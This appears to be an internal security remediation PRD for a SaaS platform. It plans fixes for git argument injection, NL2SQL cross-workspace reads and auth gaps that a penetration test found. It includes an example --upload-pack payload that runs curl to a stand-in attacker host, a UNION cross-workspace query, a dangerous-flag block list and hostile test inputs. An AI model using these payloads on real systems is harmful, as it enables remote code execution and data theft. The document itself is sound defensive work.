PRD-70: Security Hardening — Pen Test Remediation

Version: 1.0 Status: Draft — CRITICAL PRIORITY Priority: P0 Author: Gar Kavanagh + Auto CTO Created: 2026-03-03 Updated: 2026-03-03 Dependencies: PRD-44 (Security Hardening Architecture — 12 of 45 stories complete), PRD-18 (Credential Management — COMPLETE), PRD-61 (NL2SQL V2 — COMPLETE) Source: Shannon AI Penetration Test Report (2026-03-03), 4.4 hours, $90.83, 12 phases completed Branch: fix/pentest-remediation-70

Executive Summary

On 2026-03-03, the Shannon AI penetration testing framework completed a full-scope assessment of https://ui.automatos.app covering authentication, authorization, XSS, SQL/command injection, and SSRF. Shannon was unable to breach the external perimeter — zero vulnerabilities were exploited from an unauthenticated position. Clerk auth, the waitlist system, and Next.js framework protections held.

However, Shannon identified 8 injection vulnerabilities and 21 authorization concerns through code analysis that become exploitable once an attacker has a valid account. Since Automatos is a SaaS platform where every paid user gets an authenticated session, "requires authentication" is not a mitigating factor — it's the baseline.

Independent Verification Results

I independently verified every Shannon finding against the actual codebase. Shannon's analysis was partially based on PRD documentation rather than live code (they acknowledged this limitation). Here's what changed after verification:

Shannon Finding

Shannon Severity

Verified Severity

Notes

7 command injection (git clone)

CRITICAL

CRITICAL — Confirmed

3 distinct code paths, all missing -- separator, branch params unvalidated

1 SQL injection (NL2SQL)

CRITICAL

MEDIUM — Downgraded

PRD-61 fix catches mutations in subqueries. Real risk is UNION cross-workspace reads

Auto-admin @automatos.app

CRITICAL

LOW — Downgraded

Backend removed this (clerk.py:196). Frontend-only — doesn't grant backend access

Frontend-only admin auth

CRITICAL

FALSE POSITIVE

Backend has _assert_admin() on every admin endpoint

21 IDOR / authz issues

HIGH (21 items)

LOW — Downgraded

Backend consistently filters by workspace_id on all CRUD operations

4 SSRF via git clone

HIGH

CRITICAL — Same as cmd injection

Same root cause as command injection findings

JWT audience validation

MEDIUM

MEDIUM — Confirmed

Configuration check needed

Generated images proxy SSRF

MEDIUM

FALSE POSITIVE — Confirmed

Next.js framework protection blocks exploitation

Bottom line: Shannon overcounted by basing findings on PRD docs instead of actual code. The real attack surface is smaller but the git clone vulnerabilities are genuinely critical. This PRD fixes everything that actually matters.

What's Actually Critical

Git argument injection — 3 live code paths allow RCE via --upload-pack flag injection. Authenticated users can execute arbitrary commands on the backend server.
Missing -- separator — No git subprocess call uses -- to delimit options from positional arguments. URLs starting with -- are interpreted as flags.
NL2SQL cross-workspace reads — The validator prevents mutations but doesn't enforce workspace isolation in SELECT queries. UNION-based cross-workspace data exfiltration is possible.
Database SSL not enforced — Connection strings lack sslmode=require.
Frontend auto-admin remnant — role-context.tsx:44-48 still grants admin UI to @automatos.app emails even though the backend ignores it.

1. Findings Detail

1.1 CRITICAL: Git Argument Injection (3 Code Paths + 1 Script)

All paths share the same root cause: user-controlled branch parameters are passed to git subprocess calls without validation, and no -- separator is used.

Path A: Skills Import (`skill_loader.py`) — HIGHEST RISK

Frontend (import-git-modal.tsx:49)
→ API (POST /api/v1/skills/sources/git)    ← NO ADMIN CHECK
→ skill_loader.py:283 — validate_git_url(git_url) ← VALIDATES DOMAIN ONLY
→ skill_loader.py:312 — self._git_clone(git_url, local_path, branch)
→ skill_loader.py:560-566:
    cmd = ["git", "clone", "--depth", "50", "--branch", branch, git_url, local_path]
    subprocess.run(cmd, timeout=300, capture_output=True, text=True)

Critical discovery: The skills import endpoint at api/skills.py:183 has NO admin check. ANY authenticated user can import git repos. Skills auto-activate immediately with no approval workflow (unlike plugins which require admin approval + security scan).

What's validated: validate_git_url() at line 96 checks the URL hostname against an allowlist (github.com, gitlab.com, bitbucket.org). This blocks arbitrary URLs but does NOT prevent branch parameter injection.

What's NOT validated:

branch parameter — no validation at all. --upload-pack='bash -c "curl attacker.com"' as branch value gives RCE.
No -- separator before positional git_url argument

Contrast with Plugins: The plugin import path (POST /api/admin/plugins/import-github) correctly requires _assert_admin() at line 507 of admin_plugins.py, runs a full security scan (static + LLM), and requires admin approval. Skills bypass all of this.

Decision: Lock skills import to admin-only for now. Future: build a safe user-facing import flow with full security scan + marketplace approval, matching the plugin pipeline.

Path B: CodeGraph Indexing (`codegraph_service.py`) — KEEP BUT SECURE

Frontend (api-client.ts:1442-1454)
→ API (POST /api/code-graph/index/github)    ← NO ADMIN CHECK
→ codegraph_service.py:460:
    Repo.clone_from(clone_url, temp_dir, branch=branch, depth=1)

What's validated: Nothing. The IndexGitHubRequest Pydantic model accepts any string as github_url — no URL parsing, no domain check, no protocol check.

What works well:

Workspace scoping is enforced at DB level — all codegraph tables filter by workspace_id
Clones into tempfile.mkdtemp() — cleaned up on success and failure
Duplicate prevention — won't re-index if status is already "indexing"

What needs fixing:

Add URL validation (HTTPS only, github.com/gitlab.com/bitbucket.org only — this IS a code indexing tool)
Add branch validation (no leading -)
GitPython's Repo.clone_from() passes branch to git CLI — same injection risk
Auth token injected into URL at line 452 — if exception leaks the URL, token is exposed

Path C: Workspace GitHub Clone (`workspace_github.py`) — BEST ISOLATED

Frontend (workspace github UI)
→ API (POST /api/workspaces/{workspace_id}/github/clone)
→ workspace_github.py:217-223:
    step = {"action": "git_clone", "repo": clone_url, "branch": body.branch}
→ Redis queue → workspace-worker container → executor.py:365-402
→ Files land at /workspaces/{workspace_id}/repos/{repo_name}

Already well-secured:

CloneRequest Pydantic model has @field_validator("repo_url") — validates HTTPS only, allowed hosts (github.com, gitlab.com, bitbucket.org), strips embedded credentials
Runs in separate workspace-worker container (not the backend server)
Per-workspace filesystem isolation (/workspaces/{workspace_id}/)
Backend has read-only mount; worker has read-write
Command whitelist blocks sudo, su, mount, etc.
Path traversal prevention via resolve_safe_path()
5GB quota per workspace
Workspace access verified at line 180

What still needs fixing:

branch parameter has no validation — same leading - injection risk
Worker's git clone command doesn't use -- separator
These are lower severity because the worker container has limited blast radius vs. the backend server

Path D: Plugin Harvest Script (`harvest_plugins.py`)

harvest_plugins.py:152:
    subprocess.run(["git", "clone", "--depth", "1", url, str(dest)])

Lower risk: Standalone script, not an API endpoint. URLs come from hardcoded CURATED_REPOS list. Plugins go through PluginUploadService with full security scan. Fix for completeness.

1.2 MEDIUM: NL2SQL Validator Gaps

Shannon's claim: "Regex validator fails to detect nested subqueries with mutations."

Actual state: The validator at modules/nl2sql/query/validator.py:203-210 was fixed in PRD-61 (US-009). It strips string literals, then checks DENY_KEYWORDS (\bINSERT\b, \bUPDATE\b, \bDELETE\b, etc.) across the ENTIRE SQL including subqueries. Nested INSERT INTO ... RETURNING * WOULD be caught because \bINSERT\b matches the keyword even inside a subquery.

What IS still vulnerable:

UNION cross-workspace reads — SELECT * FROM users WHERE workspace_id = 'mine' UNION SELECT * FROM users WHERE workspace_id = 'theirs'. No mutations, passes all keyword checks. The table allowlist helps (line 214-223 validates tables against schema metadata), but if the NL2SQL data source includes shared tables like users or workspace_members, cross-workspace reads are possible.
RETURNING not in deny list — While INSERT is denied, if an LLM generates SQL using only RETURNING in a creative way, there's no catch.
Regex fundamentally can't parse SQL — Edge cases will always exist. AST-based parsing is the correct approach.

Real severity: MEDIUM (not CRITICAL). The mutation protection works. The residual risk is cross-workspace SELECTs.

1.3 LOW: Frontend Auto-Admin Remnant

// frontend/contexts/role-context.tsx:44-48
// Auto-admin for @automatos.app domain
// Anyone with an @automatos.app email is automatically an admin
const primaryEmail = session.user.primaryEmailAddress?.emailAddress
if (primaryEmail?.endsWith('@automatos.app')) {
    roleFromToken = 'admin'
}

Backend status: Removed. orchestrator/core/auth/clerk.py:196 has the comment: "Domain-based auto-admin was removed for security (see PRD-43 US-025)."

Impact: Frontend shows admin UI to @automatos.app users, but all admin API calls go through _assert_admin() which checks system_role from the Clerk JWT, not email domain. An attacker registering with @automatos.app email gets admin UI but every admin API call returns 403.

Still should be fixed: The frontend check should be removed to prevent confusion and to align with the principle that security decisions should never happen in the frontend.

1.4 FALSE POSITIVES (Shannon Overcounts)

21 IDOR / authorization issues: Backend verification confirms comprehensive workspace filtering:

agents.py:611 — Agent.workspace_id == ctx.workspace_id
documents.py:501 — Document.workspace_id == ctx.workspace_id
workflows.py:387 — Workflow.workspace_id == ctx.workspace_id
channels.py — parameterized workspace_id in raw SQL
Admin endpoints — _assert_admin() on every handler
Chat endpoints — user_id ownership checks

Shannon could not test these from an unauthenticated position and classified them based on PRD documentation rather than actual code review. The backend implementation is sound.

Frontend-only admin auth: Backend admin_plugins.py and admin_prompts.py both implement _assert_admin() — a function that checks ctx.user.system_role in ("admin", "super_admin") on every request. This is not frontend-only.

1.5 MEDIUM: Infrastructure Gaps (From Data Security Audit)

Gap

Current State

Risk

Database SSL

No sslmode in DATABASE_URL

Data in transit unencrypted between backend and Postgres

Redis TLS

No TLS configured

Cached data (sessions, rate limits) unencrypted

Redis dangerous commands

FLUSHDB, FLUSHALL, CONFIG available

If Redis exposed, full data wipe possible

Audit service

Stub file (199 bytes, no implementation)

No audit trail for security-sensitive operations

JWT audience validation

Optional — may not be configured

Cross-Clerk-app JWT reuse if CLERK_AUDIENCE unset

2. Remediation Plan

Phase 1: Critical Fixes (Week 1) — Stop the Bleeding

These fixes prevent RCE on the backend server. Ship immediately.

FIX-01: Secure Git Operations (ALL code paths)

Create: orchestrator/core/security/git_sanitizer.py

"""
Centralized git URL and branch validation.
All git subprocess calls MUST use these functions.
"""

import re
from urllib.parse import urlparse
from typing import Tuple, Optional, List

ALLOWED_GIT_DOMAINS = [
    "github.com",
    "gitlab.com",
    "bitbucket.org",
]

# Git arguments that enable command execution
DANGEROUS_GIT_FLAGS = [
    "--upload-pack",
    "--receive-pack",
    "-c",
    "--config",
    "--exec-path",
    "--template",
]

BRANCH_PATTERN = re.compile(r"^[a-zA-Z0-9][a-zA-Z0-9._/\-]*$")

def validate_git_url(url: str, allowed_domains: List[str] | None = None) -> Tuple[bool, Optional[str]]:
    """Validate git URL: HTTPS only, domain allowlist, no argument injection."""
    domains = allowed_domains or ALLOWED_GIT_DOMAINS

    if url.startswith("-"):
        return False, "URL must not start with a dash"

    try:
        parsed = urlparse(url)
    except Exception:
        return False, "Invalid URL format"

    if parsed.scheme not in ("https",):
        return False, f"Only HTTPS URLs are allowed (got: {parsed.scheme or 'none'})"

    hostname = (parsed.hostname or "").lower()
    if not any(hostname == d or hostname.endswith("." + d) for d in domains):
        return False, f"Domain not in allowlist: {hostname}"

    return True, None

def validate_branch(branch: str) -> Tuple[bool, Optional[str]]:
    """Validate branch name: alphanumeric + . / _ - only, no leading dash."""
    if not branch:
        return False, "Branch name is required"
    if branch.startswith("-"):
        return False, "Branch name must not start with a dash"
    if not BRANCH_PATTERN.match(branch):
        return False, "Branch contains invalid characters"
    if len(branch) > 255:
        return False, "Branch name too long"
    return True, None

def build_git_clone_cmd(
    url: str,
    target_dir: str,
    branch: str = "main",
    depth: int = 50,
) -> list[str]:
    """Build a safe git clone command with -- separator."""
    cmd = ["git", "clone", "--depth", str(depth)]
    if branch:
        cmd.extend(["--branch", branch])
    cmd.append("--")  # End of options — everything after is positional
    cmd.extend([url, target_dir])
    return cmd

Modify files:

File

Change

Priority

api/skills.py

Add _assert_admin(ctx) check to import_git_repository() at line 183. Skills import is admin-only until a safe user-facing flow is built.

modules/agents/services/skill_loader.py

Replace inline validate_git_url with import from git_sanitizer. Add validate_branch() call before _git_clone(). Use build_git_clone_cmd() in _git_clone().

modules/codegraph/codegraph_service.py

Add validate_git_url() + validate_branch() before Repo.clone_from(). Validate URL is HTTPS + allowed domain (this is a code indexing tool — only git hosts make sense).

api/workspace_github.py

Add validate_branch() before building task step. URL already validated by Pydantic model.

services/workspace-worker/executor.py

Add -- separator to git clone command in _git_clone() handler (line ~380). Add validate_branch().

scripts/harvest_plugins.py

Add validate_git_url() before clone_repo(). Use build_git_clone_cmd().

Key principles:

Every git URL is validated: HTTPS only, domain allowlist, no leading -
Every branch name is validated: alphanumeric + ./_-, no leading -
Every subprocess.run git call uses -- separator before positional args
One module, one import — no per-file reimplementation
Skills import locked to admin-only (matches plugin import pattern)

FIX-02: Remove Frontend Auto-Admin

Modify: frontend/contexts/role-context.tsx

Delete lines 44-49 (the @automatos.app domain check). Admin role should come exclusively from Clerk publicMetadata.role.

FIX-03: Enforce JWT Audience Validation

Modify: orchestrator/core/auth/clerk.py

Ensure CLERK_AUDIENCE is set and validated. Add a startup check:

# In config.py
CLERK_AUDIENCE: str = os.getenv("CLERK_AUDIENCE", "")

# In clerk.py — verify_token()
if config.CLERK_AUDIENCE:
    # Validate aud claim matches
    ...

Add to deployment checklist: CLERK_AUDIENCE must be set in all environments.

Phase 2: Defense in Depth (Week 2) — Harden the Perimeter

FIX-04: NL2SQL Query Hardening

Modify: orchestrator/modules/nl2sql/query/validator.py

Add RETURNING to deny list:

DENY_KEYWORDS = [
    r"\bINSERT\b", r"\bUPDATE\b", r"\bDELETE\b", r"\bALTER\b",
    r"\bTRUNCATE\b", r"\bDROP\b", r"\bCREATE\b", r"\bMERGE\b",
    r"\bGRANT\b", r"\bREVOKE\b", r"\bVACUUM\b",
    r"\bRETURNING\b",  # NEW: Prevents mutation disguised as SELECT
    r"\bCOPY\b",       # NEW: Prevents COPY TO/FROM
    r"\bEXECUTE\b",    # NEW: Prevents dynamic SQL
]

Enforce workspace isolation at SQL level:

def _inject_workspace_filter(self, sql: str, workspace_id: str) -> str:
    """Ensure all queries are workspace-scoped."""
    # For each table reference, verify a workspace_id filter exists
    # If not, inject WHERE workspace_id = :workspace_id
    ...

Add CTE detection:

if re.search(r"\bWITH\b", clean_sql, flags=re.IGNORECASE):
    raise SQLValidationError("CTEs (WITH clauses) are not allowed")

Future: Replace regex with AST parsing (Phase 3). Use sqlglot or pglast to parse SQL into an AST and validate the tree structure rather than string patterns.

FIX-05: Database Connection Security

Modify: orchestrator/config.py and docker-compose.yml

Add sslmode=require to DATABASE_URL:

DATABASE_URL = os.getenv("DATABASE_URL", "").rstrip()
if DATABASE_URL and "sslmode" not in DATABASE_URL:
    DATABASE_URL += "?sslmode=require" if "?" not in DATABASE_URL else "&sslmode=require"

Disable Redis dangerous commands in docker-compose.yml:

redis:
  command: >
    redis-server
    --requirepass ${REDIS_PASSWORD:?required}
    --maxmemory 256mb
    --maxmemory-policy allkeys-lru
    --rename-command FLUSHDB ""
    --rename-command FLUSHALL ""
    --rename-command CONFIG ""
    --rename-command DEBUG ""

Note: CONFIG rename breaks Redis introspection tools. Only apply in production. Use an environment-conditional redis.conf if needed.

FIX-06: Audit Service Implementation

Modify: orchestrator/core/services/audit_service.py

The audit service is currently a 199-byte stub. Implement actual audit logging for security-sensitive operations:

AUDITED_EVENTS = [
    "git_clone",              # Any git clone operation
    "admin_access",           # Admin endpoint access
    "workspace_role_change",  # Role modifications
    "credential_access",      # Credential resolution
    "nl2sql_query",           # Database queries via NL2SQL
    "plugin_import",          # Plugin imports
    "skill_import",           # Skill imports
    "api_key_create",         # API key generation
]

Write to the audit_logs table (already defined in schema). Include: timestamp, user_id, workspace_id, event_type, resource_id, ip_address, user_agent, result (success/failure), and metadata JSON.

Phase 3: Proactive Security (Weeks 3-4)

FIX-07: Rate Limiting per Workspace

Modify: Rate limiting configuration

Current: 60 req/min per IP (global). Add per-workspace rate limiting for sensitive operations:

Operation

Rate Limit

Git clone (any path)

5/hour per workspace

NL2SQL query

30/min per workspace

Admin operations

20/min per user

Plugin/skill import

3/hour per workspace

FIX-08: CSP and Security Headers

Modify: frontend/middleware.ts or Next.js config

Verify and enforce:

Content-Security-Policy — restrict script sources, prevent inline scripts
X-Content-Type-Options: nosniff
X-Frame-Options: DENY
Referrer-Policy: strict-origin-when-cross-origin
Permissions-Policy — disable unused browser features

FIX-09: Dependency Audit

Run pip audit and npm audit / yarn audit to identify known CVEs in dependencies. Fix or pin affected packages.

FIX-10: Scheduled Shannon Re-Test

After all fixes are deployed, re-run Shannon with authenticated test credentials to:

Verify all injection paths are blocked
Test IDOR/authz with actual authenticated sessions
Validate workspace isolation under adversarial conditions

3. File Impact Table

New Files

File

Fix

Description

orchestrator/core/security/__init__.py

FIX-01

Security utilities package

orchestrator/core/security/git_sanitizer.py

FIX-01

Centralized git URL/branch validation

orchestrator/tests/security/test_git_sanitizer.py

FIX-01

Unit tests for git sanitizer

orchestrator/tests/security/test_nl2sql_validator.py

FIX-04

Adversarial SQL injection test cases

Modified Files

File

Fix

Change

orchestrator/api/skills.py

FIX-01

Add _assert_admin() to skills git import endpoint — admin-only until safe user flow exists

orchestrator/modules/agents/services/skill_loader.py

FIX-01

Replace inline validation with git_sanitizer imports; add -- separator; add branch validation

orchestrator/modules/codegraph/codegraph_service.py

FIX-01

Add URL/branch validation before Repo.clone_from(); HTTPS + domain allowlist

orchestrator/api/workspace_github.py

FIX-01

Add branch validation before task submission (URL already validated by Pydantic)

services/workspace-worker/executor.py

FIX-01

Add -- separator + branch validation in _git_clone() handler

orchestrator/scripts/harvest_plugins.py

FIX-01

Add URL validation; use build_git_clone_cmd()

frontend/contexts/role-context.tsx

FIX-02

Remove @automatos.app auto-admin logic

orchestrator/core/auth/clerk.py

FIX-03

Enforce CLERK_AUDIENCE validation

orchestrator/config.py

FIX-03, FIX-05

Add CLERK_AUDIENCE config; add sslmode to DATABASE_URL

orchestrator/modules/nl2sql/query/validator.py

FIX-04

Add RETURNING/COPY/EXECUTE to deny list; add CTE detection; add workspace filter injection

docker-compose.yml

FIX-05

Disable Redis dangerous commands

orchestrator/core/services/audit_service.py

FIX-06

Implement actual audit logging (replace stub)

4. Test Plan

Unit Tests (FIX-01: Git Sanitizer)

# test_git_sanitizer.py

# URL validation
def test_rejects_non_https(): ...              # "http://github.com/x/y" → False
def test_rejects_file_protocol(): ...          # "file:///etc/passwd" → False
def test_rejects_unknown_domain(): ...         # "https://evil.com/x/y" → False
def test_rejects_leading_dash(): ...           # "--upload-pack=evil https://github.com/x/y" → False
def test_accepts_github_https(): ...           # "https://github.com/x/y" → True
def test_accepts_gitlab_https(): ...           # "https://gitlab.com/x/y" → True
def test_rejects_no_protocol(): ...            # "github.com/x/y" → False

# Branch validation
def test_rejects_upload_pack_as_branch(): ...  # "--upload-pack=evil" → False
def test_rejects_config_as_branch(): ...       # "-c protocol.ext.allow=always" → False
def test_rejects_leading_dash_branch(): ...    # "-malicious" → False
def test_accepts_normal_branch(): ...          # "main", "feat/my-feature", "v1.0.0" → True
def test_accepts_slashes(): ...                # "feature/auth/oauth" → True

# Command building
def test_cmd_has_double_dash(): ...            # "--" appears before URL
def test_cmd_url_after_double_dash(): ...      # URL is positional, not flag

Unit Tests (FIX-04: NL2SQL Hardening)

# test_nl2sql_validator.py

# Mutation detection (existing + new)
def test_rejects_insert_in_subquery(): ...     # "SELECT * FROM (INSERT INTO...)" → rejected
def test_rejects_returning_clause(): ...       # "... RETURNING *" → rejected
def test_rejects_cte_with_mutation(): ...      # "WITH x AS (DELETE FROM...)" → rejected
def test_rejects_copy_to(): ...                # "COPY ... TO ..." → rejected

# Cross-workspace (new)
def test_rejects_union_without_workspace(): ...  # UNION accessing other workspace data
def test_injects_workspace_filter(): ...         # Workspace filter added when missing

Integration Tests

Test

Validates

Submit skills import with --upload-pack as branch

Returns 400, not 500 or RCE

Submit codegraph index with file:///etc/passwd as URL

Returns 400

Submit workspace clone with internal IP as URL

Returns 400

Admin endpoint without admin role

Returns 403 (backend enforced)

NL2SQL with UNION cross-workspace query

Returns validation error

Regression Test (Post-Deploy)

Re-run Shannon with authenticated test credentials. Provide:

2 test accounts in different workspaces (for IDOR testing)
1 admin account (for vertical escalation testing)
1 regular user account (for privilege escalation testing)

5. Deployment Checklist

Pre-Deploy (Environment Config)

Set CLERK_AUDIENCE in all environments (Railway, staging, prod)
Verify DATABASE_URL includes sslmode=require in production
Verify REDIS_PASSWORD is set and strong (not the dev default)
Rotate ORCHESTRATOR_API_KEY (treat current value as potentially leaked)
Remove [email protected] from Clerk users (Shannon created this during testing)

Deploy Order

FIX-01 (git sanitizer) — Ship first, blocks RCE
FIX-02 (frontend auto-admin removal) — Quick frontend deploy
FIX-03 (JWT audience) — Config change + code
FIX-04 (NL2SQL hardening) — Backend deploy
FIX-05 (DB/Redis security) — Infrastructure change, schedule maintenance window
FIX-06 (audit service) — Backend deploy
FIX-07 through FIX-09 — Iterative hardening

Post-Deploy Verification

Attempt --upload-pack injection on skills import → expect 400
Attempt file:// URL on codegraph index → expect 400
Verify admin endpoints return 403 for non-admin Clerk users
Verify NL2SQL rejects RETURNING keyword
Confirm audit logs are being written for git_clone events
Schedule Shannon re-test with authenticated credentials

6. Architecture Context: Why Each Path Has Different Risk

Understanding the isolation model changes the severity assessment:

┌─────────────────────────────────────────────────────────────────┐
│                    BACKEND CONTAINER (FastAPI)                    │
│                                                                   │
│  Path A: skill_loader._git_clone()                               │
│    └─ subprocess.run("git clone ...") ← RUNS ON BACKEND SERVER  │
│    └─ ANY user can trigger ← NO ADMIN CHECK                     │
│    └─ Skills auto-activate globally ← NO APPROVAL               │
│    └─ BLAST RADIUS: Full backend server (DB creds, API keys)    │
│                                                                   │
│  Path B: codegraph Repo.clone_from()                             │
│    └─ GitPython clone ← RUNS ON BACKEND SERVER                  │
│    └─ ANY user can trigger ← NO ADMIN CHECK                     │
│    └─ Temp dir, cleaned up after indexing                        │
│    └─ BLAST RADIUS: Full backend server                         │
│                                                                   │
│  Plugin import: harvest_plugins.clone_repo()                     │
│    └─ subprocess.run("git clone ...") ← RUNS ON BACKEND SERVER  │
│    └─ ADMIN ONLY ← _assert_admin() ✅                           │
│    └─ Full security scan + approval ✅                           │
│    └─ BLAST RADIUS: Full backend server (but admin-gated)       │
│                                                                   │
└─────────────┬───────────────────────────────────────────────────┘
              │ Redis queue
              ▼
┌─────────────────────────────────────────────────────────────────┐
│              WORKSPACE-WORKER CONTAINER (separate)               │
│                                                                   │
│  Path C: executor._git_clone()                                   │
│    └─ git clone in sandbox ← RUNS IN WORKER CONTAINER           │
│    └─ Workspace-scoped filesystem (/workspaces/{ws_id}/)        │
│    └─ Command whitelist (no sudo, su, mount)                     │
│    └─ Sandboxed env (no inherited PATH or secrets)              │
│    └─ 5GB quota per workspace                                    │
│    └─ URL validated by Pydantic (HTTPS + allowed hosts)         │
│    └─ BLAST RADIUS: Worker container only (no DB creds)         │
│                                                                   │
└─────────────────────────────────────────────────────────────────┘

Path C (workspace clone) is the only one with meaningful isolation. Paths A and B execute git on the backend server where environment variables contain database credentials, API keys, and secrets. An --upload-pack injection on Path A or B gives RCE with full access to POSTGRES_PASSWORD, OPENROUTER_API_KEY, CLERK_SECRET_KEY, etc.

Skills vs. Plugins: The Access Control Gap

Aspect

Skills (PRD-22)

Plugins (PRD-42)

Import endpoint

POST /api/v1/skills/sources/git

POST /api/admin/plugins/import-github

Auth requirement

Any authenticated user

Admin only (_assert_admin())

Security scan

Basic pattern matching (8 patterns)

Full static + LLM-based scan

Approval workflow

None — auto-activated

Admin approval required

Activation scope

Global (all workspaces)

Per-workspace enablement

Assignment

Direct to any agent

Via AgentAssignedPlugin

The fix: Lock POST /api/v1/skills/sources/git to admin-only immediately. This matches the plugin import pattern and removes the unauthenticated-user-to-RCE chain. Future: build a safe user-facing skill import with the same security scan + approval workflow that plugins use.

7. Shannon Assessment Quality Notes

Shannon ran a thorough 4.4-hour assessment across 12 phases. Key observations:

Strengths:

Excellent external perimeter testing — confirmed Clerk auth is robust (rate limiting at 5 attempts, Cloudflare Turnstile CAPTCHA active, bot detection working)
Thorough injection analysis — identified every git clone code path
Good methodology — proof-by-exploitation focus, no assumptions
Honest about limitations (documented that backend code analysis was based on PRDs, not actual code)

Limitations:

Based several backend findings on PRD documentation, not actual Python source (acknowledged in report)
Overcounted authorization issues (21) that were actually properly implemented in the backend
Classified NL2SQL validator as fully bypassable — missed the PRD-61 fix that catches mutations in subqueries
Auto-admin finding was based on frontend code only — didn't verify backend enforcement

Recommendation: Next Shannon run should:

Be given read access to the actual orchestrator/ Python source
Be provided authenticated test credentials (bypass waitlist)
Run an internal-scope test focused on the 21 authz items that couldn't be tested externally

PreviousPRD-69: Agent Intelligence Layer — Instincts, Evaluation & Strategic Context NextPRD-71: Unified Skills Architecture

Last updated 23 days ago

Good afternoon

hashtagExecutive Summary

hashtagIndependent Verification Results

hashtagWhat's Actually Critical

hashtag1. Findings Detail

hashtag1.1 CRITICAL: Git Argument Injection (3 Code Paths + 1 Script)

hashtagPath A: Skills Import (skill_loader.py) — HIGHEST RISK

hashtagPath B: CodeGraph Indexing (codegraph_service.py) — KEEP BUT SECURE

hashtagPath C: Workspace GitHub Clone (workspace_github.py) — BEST ISOLATED

hashtagPath D: Plugin Harvest Script (harvest_plugins.py)

hashtag1.2 MEDIUM: NL2SQL Validator Gaps

hashtag1.3 LOW: Frontend Auto-Admin Remnant

hashtag1.4 FALSE POSITIVES (Shannon Overcounts)

hashtag1.5 MEDIUM: Infrastructure Gaps (From Data Security Audit)

hashtag2. Remediation Plan

hashtagPhase 1: Critical Fixes (Week 1) — Stop the Bleeding

hashtagFIX-01: Secure Git Operations (ALL code paths)

hashtagFIX-02: Remove Frontend Auto-Admin

hashtagFIX-03: Enforce JWT Audience Validation

hashtagPhase 2: Defense in Depth (Week 2) — Harden the Perimeter

hashtagFIX-04: NL2SQL Query Hardening

hashtagFIX-05: Database Connection Security

hashtagFIX-06: Audit Service Implementation

hashtagPhase 3: Proactive Security (Weeks 3-4)

hashtagFIX-07: Rate Limiting per Workspace

hashtagFIX-08: CSP and Security Headers

hashtagFIX-09: Dependency Audit

hashtagFIX-10: Scheduled Shannon Re-Test

hashtag3. File Impact Table

hashtagNew Files

hashtagModified Files

hashtag4. Test Plan

hashtagUnit Tests (FIX-01: Git Sanitizer)

hashtagUnit Tests (FIX-04: NL2SQL Hardening)

hashtagIntegration Tests

hashtagRegression Test (Post-Deploy)

hashtag5. Deployment Checklist

hashtagPre-Deploy (Environment Config)

hashtagDeploy Order

hashtagPost-Deploy Verification

hashtag6. Architecture Context: Why Each Path Has Different Risk

hashtagSkills vs. Plugins: The Access Control Gap

hashtag7. Shannon Assessment Quality Notes

Executive Summary

Independent Verification Results

What's Actually Critical

1. Findings Detail

1.1 CRITICAL: Git Argument Injection (3 Code Paths + 1 Script)

Path A: Skills Import (`skill_loader.py`) — HIGHEST RISK

Path B: CodeGraph Indexing (`codegraph_service.py`) — KEEP BUT SECURE

Path C: Workspace GitHub Clone (`workspace_github.py`) — BEST ISOLATED

Path D: Plugin Harvest Script (`harvest_plugins.py`)

1.2 MEDIUM: NL2SQL Validator Gaps

1.3 LOW: Frontend Auto-Admin Remnant

1.4 FALSE POSITIVES (Shannon Overcounts)

1.5 MEDIUM: Infrastructure Gaps (From Data Security Audit)

2. Remediation Plan

Phase 1: Critical Fixes (Week 1) — Stop the Bleeding

FIX-01: Secure Git Operations (ALL code paths)

FIX-02: Remove Frontend Auto-Admin

FIX-03: Enforce JWT Audience Validation

Phase 2: Defense in Depth (Week 2) — Harden the Perimeter

FIX-04: NL2SQL Query Hardening

FIX-05: Database Connection Security

FIX-06: Audit Service Implementation

Phase 3: Proactive Security (Weeks 3-4)

FIX-07: Rate Limiting per Workspace

FIX-08: CSP and Security Headers

FIX-09: Dependency Audit

FIX-10: Scheduled Shannon Re-Test

3. File Impact Table

New Files

Modified Files

4. Test Plan

Unit Tests (FIX-01: Git Sanitizer)

Unit Tests (FIX-04: NL2SQL Hardening)

Integration Tests

Regression Test (Post-Deploy)

5. Deployment Checklist

Pre-Deploy (Environment Config)

Deploy Order

Post-Deploy Verification

6. Architecture Context: Why Each Path Has Different Risk

Skills vs. Plugins: The Access Control Gap

7. Shannon Assessment Quality Notes